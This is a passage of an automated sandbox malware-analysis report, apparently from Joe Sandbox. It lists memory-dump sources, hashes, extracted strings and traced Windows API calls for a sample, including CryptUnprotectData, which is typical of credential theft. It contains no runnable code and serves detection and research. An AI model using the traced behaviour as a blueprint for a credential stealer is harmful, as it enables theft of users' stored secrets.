                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID:
                    • API String ID: 4291131564-0
                    • Opcode ID: d7f522eb6cc3c7f8461a0d6f2245c6eab71b7af6eb9db060d7a14d70935f141e
                    • Instruction ID: 938fa81a2e110d6ef159e16541687762bf1e40e34a1c1f8533c1f6ff47c11806
                    • Opcode Fuzzy Hash: d7f522eb6cc3c7f8461a0d6f2245c6eab71b7af6eb9db060d7a14d70935f141e
                    • Instruction Fuzzy Hash: 6011A4B4240308BFEB14CF64DC99FAA77B5FB89700F208058F915AB390C776A941CB50
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BE0E00,00000000,?), ref: 00BD79B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD79B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00BE0E00,00000000,?), ref: 00BD79C4
                    • wsprintfA.USER32 ref: 00BD79F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: f86e5986f830a31065e0d0bd7dd3fec35404fa53178a76a979d1ca444033a29b
                    • Instruction ID: 68413404da2fab1ff37b127ae96b19e8f2bef7e5dd5a08e8d0dc37222f940e27
                    • Opcode Fuzzy Hash: f86e5986f830a31065e0d0bd7dd3fec35404fa53178a76a979d1ca444033a29b
                    • Instruction Fuzzy Hash: EF115AB2904218ABCB14DFCADD44BBEB7F8FB4CB11F04415AF601B2280E23A5944C7B1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013CE248,00000000,?,00BE0E10,00000000,?,00000000,00000000), ref: 00BD7A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013CE248,00000000,?,00BE0E10,00000000,?,00000000,00000000,?), ref: 00BD7A7D
                    • wsprintfA.USER32 ref: 00BD7AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: b069e980d001995f9d43823cbde4ef632d6869ffb16420ff100467e837c0e126
                    • Instruction ID: 4dbb6f5d12461368aef4e8189c456f0a1aa46f86de70b33d58b9ff7a790b9081
                    • Opcode Fuzzy Hash: b069e980d001995f9d43823cbde4ef632d6869ffb16420ff100467e837c0e126
                    • Instruction Fuzzy Hash: F611A0B0A45218DFDB108B55DC49F99B7B8FB04711F0042EAE506A3280D7741A84CB51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: <6?w$l)og$1}
                    • API String ID: 0-392482550
                    • Opcode ID: 6e642820eb04e5c8497f56fdeac505c5644befcdd404bccc01ff58da07d1e5d3
                    • Instruction ID: f0dd800e7062338035ef2c77f99320794b7f6367431c4fcb8647d4e4bc4e8e6e
                    • Opcode Fuzzy Hash: 6e642820eb04e5c8497f56fdeac505c5644befcdd404bccc01ff58da07d1e5d3
                    • Instruction Fuzzy Hash: 03B216F360C2049FE3046E2DEC8577ABBE9EF94720F1A463DEAC583744EA3558058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Cj$A{v$Y!y
                    • API String ID: 0-1802732071
                    • Opcode ID: 418a5f9b3925694aebda2d4fc1e4dd17713c8ddb53ad6558e4ec0afa6c94c35f
                    • Instruction ID: 9aa07e356623a46954cf2dc003126db866d486c114fe835d3cce3027110d225a
                    • Opcode Fuzzy Hash: 418a5f9b3925694aebda2d4fc1e4dd17713c8ddb53ad6558e4ec0afa6c94c35f
                    • Instruction Fuzzy Hash: 68A2F7F360C2049FE304AE2DEC8567ABBE9EF94720F16493DE6C4C7744EA3598058796
                    APIs
                    • CoCreateInstance.COMBASE(00BDE118,00000000,00000001,00BDE108,00000000), ref: 00BD3758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BD37B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 5db013d49d4924bfcb1e8759de2abd87e744cd7424bf1025b357b493f1a6f670
                    • Instruction ID: 5f1f9b49dc735a7164406dae6413128dbfb70ba4b67affbf284875826352efb6
                    • Opcode Fuzzy Hash: 5db013d49d4924bfcb1e8759de2abd87e744cd7424bf1025b357b493f1a6f670
                    • Instruction Fuzzy Hash: 8E41F970A00A189FDB24DB58CC95B9BB7B4BB48702F4081D9E618EB2D0E771AEC5CF51
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC9B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BC9BA3
                    • LocalFree.KERNEL32(?), ref: 00BC9BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 405b14d288189dd55fef6e4a16b56d583003ba5ef13606a714f22ae561dc062e
                    • Instruction ID: 4a250260ba5902ed88ec173247d9ebd03dd51978c1b0e75f00faeb84d3e95df6
                    • Opcode Fuzzy Hash: 405b14d288189dd55fef6e4a16b56d583003ba5ef13606a714f22ae561dc062e
                    • Instruction Fuzzy Hash: 6E11E8B4A00209EFDB04DF94D989EAE77B5FB88300F1085A8E815A7350D775AE54CB61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: wu~K$(kw
                    • API String ID: 0-1060209229
                    • Opcode ID: d2f21acb2c691bf23d91614a9a61424ed6e2d0ebe13913e55cd59aafd3b40e5e
                    • Instruction ID: c5e1f5e69d65885d930f12b615ea8b6834e64a0d5168e6651bfdc3ec8651c102
                    • Opcode Fuzzy Hash: d2f21acb2c691bf23d91614a9a61424ed6e2d0ebe13913e55cd59aafd3b40e5e
                    • Instruction Fuzzy Hash: 039207F3A086009FE308AE2DEC8577AB7E5EF94720F16893DE6C5C7740E63558058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Ym$rpk
                    • API String ID: 0-3215571682
                    • Opcode ID: d2fc79a7802c281af0e6be37574a4ea512799085d0309150652b8ab147b2b423
                    • Instruction ID: 63f21ad8bafb6f6313026c15b2da50d7f8006e1757fc8913cb137a4485fe11cf
                    • Opcode Fuzzy Hash: d2fc79a7802c281af0e6be37574a4ea512799085d0309150652b8ab147b2b423
                    • Instruction Fuzzy Hash: F7511AF39182109FE7586E2CDC9177ABBE9EB54321F1A493EDAC4D3344DA75480086C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ZC%
                    • API String ID: 0-238729973
                    • Opcode ID: 63c1bb6e30dab81c2b31dc5323a0152c392243ac6f5a40867cf75ce5fc033b0c
                    • Instruction ID: 757fbe067512d8b5763a819797d3693019d5d709d756d84f30f387fb0039bc05
                    • Opcode Fuzzy Hash: 63c1bb6e30dab81c2b31dc5323a0152c392243ac6f5a40867cf75ce5fc033b0c
                    • Instruction Fuzzy Hash: B8F1C3F36086009FE7046E19EC8177AFBE6EFD4720F1A893DE6C487744DA3558058A97
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: O`?j
                    • API String ID: 0-1599995437
                    • Opcode ID: e824d0437195db68111d610cea09f3c9e40bd59a23d3807603af7a3e6bfeeddc
                    • Instruction ID: 8c71139befb94eb2675cd3b922a86099862b06eb66163448c6bddcde31ec521f
                    • Opcode Fuzzy Hash: e824d0437195db68111d610cea09f3c9e40bd59a23d3807603af7a3e6bfeeddc
                    • Instruction Fuzzy Hash: E4513DF3A082049FE3046E7CEC4476BBBD9EF94720F19463DEAC4D3784DA3858058656
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: D?y
                    • API String ID: 0-1981770236
                    • Opcode ID: 1508ae38041f9738df6dab4db0b38f0fce499153f629428fd1f11dcfbd9c9ca0
                    • Instruction ID: 05c52376d56bc8cf39bdc9a1be578bd8508811edd3c5f229b73011d3137da25d
                    • Opcode Fuzzy Hash: 1508ae38041f9738df6dab4db0b38f0fce499153f629428fd1f11dcfbd9c9ca0
                    • Instruction Fuzzy Hash: A46138B3A183105BE350AE2DDC8477AB7D9EF94720F1A423DDF8993780E93A6D044796
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $}
                    • API String ID: 0-997030075
                    • Opcode ID: 140a0dcc92c3118789f56914a4932f9a2d50680679096038f3e7ff4d57e29d9d
                    • Instruction ID: 9d56cbb81e07403b9088763e4af515ef8503dce1e039a34ea20c3a37dc8bb358
                    • Opcode Fuzzy Hash: 140a0dcc92c3118789f56914a4932f9a2d50680679096038f3e7ff4d57e29d9d
                    • Instruction Fuzzy Hash: 3E5104F3A597045BF3086968ED953B676C6DBD4321F2B823DE79983B88EC7E48014285
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
